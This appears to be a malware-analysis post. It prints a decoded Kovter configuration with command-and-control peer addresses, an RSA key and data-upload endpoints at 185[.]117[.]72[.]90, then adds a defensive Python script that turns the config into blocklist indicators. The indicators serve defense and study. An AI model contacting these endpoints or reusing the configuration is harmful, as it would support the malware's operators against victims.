cp1::[133 host:port entries separated by “>”, omitted] cp1
cptm::30::cptm
key::a7887cc809cf0d4df17fc5dafd03e4e7::key
pass::65537::[long decimal RSA modulus, omitted]::pass
debug::0::debug
elg::1::elg
dl_sl::0::dl_sl
b_dll::0::b_dll
nonul http://185[.]117[.]72[.]90/upload2[.]php nonul
dnet32::http://download[.]microsoft[.]com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86[.]exe dnet32
dnet64::http://download[.]microsoft[.]com/download/9/8/6/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64[.]exe dnet64
pshellxp::http://download[.]microsoft[.]com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG[.]exe pshellxp
pshellvistax32::http://download[.]microsoft[.]com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6[.]0-KB968930-x86[.]msu pshellvistax32
pshellvistax64::http://download[.]microsoft[.]com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6[.]0-KB968930-x64[.]msu pshellvistax64
pshell2k3x32::http://download[.]microsoft[.]com/download/1/1/7/117FB25C-BB2D-41E1-B01E-0FEB0BC72C30/WindowsServer2003-KB968930-x86-ENG[.]exe pshell2k3x32
pshell2k3x64::http://download[.]microsoft[.]com/download/B/D/9/BD9BB1FF-6609-4B10-9334-6D0C58066AA7/WindowsServer2003-KB968930-x64-ENG[.]exe pshell2k3x64
cl_fv::24::cl_fv
fl_fu::http://fpdownload[.]macromedia[.]com/get/flashplayer/current/licensing/win/install_flash_player_24_active_x[.]exe fl_fu
mainanti::DD1D:1:DD1DDD2D:1:DD2DDD3D:1:DD3DDD4D:1:DD4DDD5D:0:DD5DDD6D:1:DD6DDD7D:1:DD7DDD8D:1:DD8DDD9D:1:DD9DDD10D:1:DD10DDD11D:0:DD11DDD12D:1:DD12DDD13D:1:DD13DDD14D:1:DD14DDD15D:1:DD15DDD16D:1:DD16DDD17D:0:DD17Dal:http://185[.]117[.]72[.]90/upload.php
And here are the IP addresses from the blob above, cleaned up into host:port form. Note that only a handful of the IP addresses seen in the PCAPs appear in the list below, and that several entries sit in non-routable space (for example 10[.]94[.]237[.]3 is private, 224[.]138[.]203[.]45 is multicast and 255[.]155[.]235[.]46 is reserved), so the list should be filtered before it is fed to a blocklist:
150[.]219[.]156[.]87:80 59[.]34[.]180[.]235:38232 169[.]136[.]157[.]237:80 62[.]220[.]112[.]204:443 18[.]56[.]29[.]198:80 218[.]216[.]127[.]77:80 21[.]41[.]239[.]107:80 100[.]166[.]63[.]24:80 106[.]192[.]26[.]7:80 195[.]69[.]139[.]52:443 243[.]69[.]73[.]16:80 137[.]234[.]227[.]8:80 55[.]29[.]95[.]39:80 125[.]138[.]46[.]188:80 191[.]38[.]99[.]216:443 17[.]155[.]112[.]156:80 129[.]143[.]21[.]202:8080 32[.]84[.]137[.]4:443 191[.]59[.]120[.]31:80 255[.]155[.]235[.]46:80 141[.]236[.]125[.]239:80 169[.]1[.]96[.]26:443 48[.]155[.]43[.]68:443 202[.]100[.]184[.]83:80 20[.]19[.]162[.]140:80 3[.]140[.]205[.]238:80 37[.]123[.]165[.]161:443 106[.]74[.]107[.]202:80 8[.]249[.]254[.]51:80 99[.]252[.]161[.]28:80 9[.]48[.]98[.]170:80 147[.]173[.]72[.]96:443 1[.]132[.]22[.]166:443 129[.]16[.]111[.]236:80 210[.]243[.]212[.]209:8080 18[.]53[.]35[.]179:80 114[.]187[.]128[.]212:80 60[.]103[.]18[.]131:80 172[.]132[.]76[.]194:443 113[.]67[.]58[.]224:80 20[.]179[.]35[.]232:80 73[.]249[.]184[.]108:80 9[.]222[.]103[.]137:443 204[.]197[.]26[.]221:443 224[.]138[.]203[.]45:80 244[.]157[.]143[.]47:80 190[.]67[.]48[.]224:80 180[.]42[.]36[.]109:80 208[.]118[.]116[.]55:80 4[.]195[.]63[.]225:25900 32[.]107[.]214[.]76:80 203[.]233[.]71[.]250:443 6[.]61[.]150[.]230:80 75[.]16[.]138[.]183:80 90[.]45[.]25[.]145:443 63[.]149[.]238[.]126:80 249[.]158[.]225[.]208:80 156[.]211[.]224[.]150:43912 229[.]210[.]208[.]203:80 27[.]219[.]195[.]210:80 30[.]255[.]153[.]175:80 216[.]69[.]26[.]86:80 182[.]180[.]65[.]173:443 197[.]45[.]165[.]116:443 79[.]101[.]37[.]210:80 12[.]25[.]99[.]130:80 50[.]56[.]242[.]72:8080 187[.]108[.]195[.]8:8080 212[.]219[.]93[.]114:443 138[.]4[.]86[.]20:8080 132[.]247[.]145[.]147:443 209[.]159[.]149[.]156:443 202[.]191[.]121[.]100:443 20[.]243[.]155[.]227:443 53[.]128[.]177[.]21:8080 235[.]250[.]233[.]187:80 35[.]214[.]161[.]230:443 34[.]5[.]168[.]186:443 210[.]147[.]248[.]235:443 254[.]220[.]78[.]226:47857 130[.]99[.]108[.]151:443 87[.]145[.]98[.]19:80 133[.]232[.]247[.]107:80 
25[.]111[.]58[.]211:80 13[.]102[.]27[.]247:80 205[.]246[.]43[.]28:80 229[.]157[.]60[.]81:8080 180[.]168[.]197[.]23:80 29[.]156[.]163[.]20:443 53[.]44[.]118[.]111:80 123[.]100[.]180[.]115:43893 129[.]105[.]221[.]156:443 194[.]58[.]126[.]20:80 50[.]188[.]52[.]73:80 80[.]228[.]26[.]99:80 143[.]97[.]189[.]141:32240 241[.]174[.]170[.]164:28721 20[.]129[.]203[.]86:80 6[.]211[.]88[.]116:80 20[.]168[.]78[.]137:80 163[.]91[.]30[.]241:27879 174[.]120[.]121[.]230:39788 39[.]144[.]13[.]86:80 142[.]34[.]249[.]209:443 204[.]42[.]154[.]209:80 66[.]32[.]198[.]58:80 105[.]149[.]112[.]90:80 238[.]9[.]247[.]103:80 141[.]127[.]109[.]227:35000 250[.]5[.]29[.]204:80 232[.]245[.]197[.]186:80 8[.]218[.]248[.]66:80 97[.]215[.]155[.]187:80 138[.]196[.]78[.]240:80 173[.]126[.]49[.]27:443 84[.]22[.]102[.]112:80 145[.]89[.]215[.]87:8080 10[.]94[.]237[.]3:80 25[.]100[.]119[.]180:443 206[.]63[.]226[.]28:80 149[.]201[.]173[.]198:80 15[.]26[.]248[.]116:8080 218[.]5[.]226[.]178:80 245[.]187[.]185[.]226:80 90[.]251[.]34[.]209:443 65[.]159[.]238[.]36:443 30[.]184[.]131[.]202:443 103[.]216[.]152[.]95:80 34[.]58[.]82[.]4:80 249[.]167[.]103[.]219:47074 192[.]214[.]135[.]145:80 199[.]48[.]116[.]234:80 163[.]109[.]92[.]34:42753
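To turn the decoded configuration into usable indicators without cleaning it by hand, here is an added Python example. It is not the author's tooling or anything recovered from the Kovter sample; the `name::value::name` / `name value name` tag layout is inferred from the blob as it appears above, and the `mainanti` block, which uses a different nested notation, is deliberately left unparsed. The embedded config is a constructed, truncated copy of the one on this page (seven of the cp1 peers, one of the download URLs). The script splits the cp1 peer list, re-fangs the `[.]` notation, pulls the RSA public exponent and modulus out of the `pass` field, and separates routable peers from addresses in private, reserved or multicast ranges, which are present in the list and are useless as network indicators.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed sample: a truncated copy of the decoded Kovter configuration
# above. Seven cp1 peers are kept (three chosen because they fall in
# reserved, multicast or private space), the download URLs are cut to one
# .NET link, and the mainanti block is shortened. The values themselves are
# the ones shown on the page.
MODULUS = (
    "2071757843666637020699015646178656678813274845891086535499491938863040718708278893255106556789136503"
    "3974994995141358277530021944793516607142737605543772104350635734672485498640041982499636009940196953"
    "1038771998113718341972998866900102295479938157216474142990188299144803367007757600320449224389426900"
    "0866327885644048716494605030966897273023962037340003615680722690241541468922713934369517900430514617"
    "7952041410093920067335850237232148134221904306706694425837140102211178161590920721365317540938040383"
    "0231949546139972048768504151098481887652541679244830002467751741715017334143267298459368541727153652"
    "00925796295269097"
)
SAMPLE_CONFIG = "".join([
    "cp1::150[.]219[.]156[.]87:80>59[.]34[.]180[.]235:38232>255[.]155[.]235[.]46:80>",
    "129[.]143[.]21[.]202:8080>224[.]138[.]203[.]45:80>10[.]94[.]237[.]3:80>",
    "163[.]109[.]92[.]34:42753> cp1",
    "cptm::30::cptm",
    "key::a7887cc809cf0d4df17fc5dafd03e4e7::key",
    f"pass::65537::{MODULUS}::pass",
    "debug::0::debugelg::1::elgdl_sl::0::dl_slb_dll::0::b_dll",
    "nonul http://185[.]117[.]72[.]90/upload2[.]php nonul",
    "dnet32::http://download[.]microsoft[.]com/download/0/8/c/"
    "08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86[.]exe dnet32",
    "cl_fv::24::cl_fv",
    "fl_fu::http://fpdownload[.]macromedia[.]com/get/flashplayer/current/"
    "licensing/win/install_flash_player_24_active_x[.]exe fl_fu",
    "mainanti::DD1D:1:DD1DDD2D:1:DD2Dal:http://185[.]117[.]72[.]90/upload.php",
])

# A field is `name::value::name`; the list and URL fields close with
# whitespace instead of `::` (and `nonul` opens with it), so either delimiter
# is accepted. The backreference ties each value to its own closing tag,
# which keeps the `::` inside the pass value (exponent::modulus) from
# terminating it early.
TAG_RE = re.compile(r"(\w+)(?:::|\s)(.*?)(?:::|\s)\1", re.DOTALL)


def parse_config(blob: str) -> Dict[str, str]:
    """Map every well-formed tag pair to its raw value; malformed tails are skipped."""
    return {m.group(1): m.group(2) for m in TAG_RE.finditer(blob)}


def refang(text: str) -> str:
    """Turn the post's defanged `[.]` notation back into dots."""
    return text.replace("[.]", ".")


def peers(cfg: Dict[str, str]) -> List[Tuple[str, int]]:
    """Split the `>`-separated cp1 peer list into (ip, port) pairs.

    Whitespace inside an entry is dropped, so a blob that was line-wrapped
    in the middle of an address (as on the page) still parses.
    """
    result = []
    for entry in cfg.get("cp1", "").split(">"):
        entry = re.sub(r"\s+", "", refang(entry))
        if not entry:
            continue
        host, _, port = entry.rpartition(":")
        result.append((host, int(port)))
    return result


def is_routable(ip: str) -> bool:
    """False for private, reserved (240/4), multicast, loopback, link-local or unspecified addresses."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_reserved or addr.is_multicast
                or addr.is_loopback or addr.is_link_local or addr.is_unspecified)


def rsa_public_key(cfg: Dict[str, str]) -> Tuple[int, int]:
    """Return (e, n) from the `pass` field, which stores them as decimal `e::n`."""
    e, n = cfg["pass"].split("::")
    return int(e), int(n)


def iocs(cfg: Dict[str, str]):
    """Separate routable peers from bogons and collect the refanged URL fields."""
    all_peers = peers(cfg)
    routable = [p for p in all_peers if is_routable(p[0])]
    bogons = [p for p in all_peers if not is_routable(p[0])]
    urls = {tag: refang(v) for tag, v in cfg.items() if v.startswith("http://")}
    return routable, bogons, urls


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    routable, bogons, urls = iocs(cfg)
    e, n = rsa_public_key(cfg)
    print(f"peers: {len(routable)} routable, {len(bogons)} non-routable {bogons}")
    print(f"URL fields: {urls}")
    print(f"RSA public key: e={e}, {n.bit_length()}-bit modulus; cptm={cfg['cptm']}")
```

Running it against the full blob instead of the sample only requires pasting the text of the config into `SAMPLE_CONFIG`; the `pass` field on this page decodes to a 2048-bit RSA modulus with the usual public exponent 65537, and the bogon filter is what keeps entries like 255[.]155[.]235[.]46 out of a firewall rule.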